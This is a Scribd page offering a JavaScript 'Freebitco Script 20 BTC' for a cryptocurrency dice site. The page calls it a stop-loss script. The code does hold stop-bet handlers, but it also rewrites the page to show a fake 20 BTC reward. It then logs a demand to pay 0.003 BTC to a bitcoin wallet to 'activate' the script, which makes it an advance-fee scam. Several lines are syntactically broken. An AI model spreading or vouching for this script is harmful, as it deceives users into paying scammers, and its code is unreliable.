0% found this document useful (0 votes)
386 views

Freebitco Script 20 BTC

This document contains code for a script that monitors profit levels from a dice game and stops bets automatically if profit reaches certain positive or negative thresholds. It defines variables for the profit thresholds and binds functions to events on the game history page to check the current profit against the thresholds and trigger a stop bet button if reached. Logging messages remind that the script is not currently active and payment is required to activate it.

Uploaded by

tatiana grace
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
386 views

Freebitco Script 20 BTC

This document contains code for a script that monitors profit levels from a dice game and stops bets automatically if profit reaches certain positive or negative thresholds. It defines variables for the profit thresholds and binds functions to events on the game history page to check the current profit against the thresholds and trigger a stop bet button if reached. Logging messages remind that the script is not currently active and payment is required to activate it.

Uploaded by

tatiana grace
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

var Mistake = max//profit_withdraw; /

//===================================================================
var autorounds - 1; /
var stop_profit_positivo= 0.00000750 ; // Profit Positive
var stop_profit_negativo= -0.00000500 ; // Profit Negative
//===================================================================
var stop_profit_positivo= 0.00000550 ; // Profit Positive
var stop_profit_negativo= -0.00000200 ; // Profit Negative
//===================================================================
var stop_profit_positivo= 0.00000150 ; // Profit Positive
var stop_profit_negativo= -0.00000125 ; // Profit Negative
//===================================================================
var stop_profit_positivo= 0.00000050 ; // Profit Positive
var stop_profit_negativo= -0.00000100 ; // Profit Negative
//===================================================================
var profit_atual=parseFloat($('#auto_stats_profit').text());
document.querySelector("#fp_min_reward").innerHTML = "20.00000000 BTC";
$('<p><strong id="Contato" style="font-
size:15px;color:#0000FF"></strong></p>').insertAfter('#btn-bet-start-pilot-dice');;
$('<p><strong id="Contato" style="font-
size:15px;color:#FF0000"></strong></p>').insertAfter('#btn-bet-start-pilot-dice');;
$('#history-my-bets-dice').unbind();$('#history-my-bets-
dice').bind("DOMSubtreeModified",function(eventpositivo){if( $(event.currentTarget)
){
if(stop_profit_positivo < profit_atual){$('#btn-bet-stop-pilot-
dice').trigger('click');}profit_atual=parseFloat($('#auto_stats_profit').text());
}});$('#history-my-bets-dice').bind("DOMSubtreeModified",function(eventnegativo)
{if( $(event.currentTarget) ){
if(stop_profit_negativo > profit_atual){$('#btn-bet-stop-pilot-
dice').trigger('click');}profit_atual=parseFloat($
('#auto_stats_profit').text());}});console.clear();console.log('Script not
activated!'); console.log('20.00000000 BTC is Pending ! Please activate your
Script'); console.log('To Activate Script, you need to Pay ( 0.003 BTC ) to this
BTC wallet address: 34HRS7WJK9RWjUafS1CXEGVTDsCUuTS4Jo');

You might also like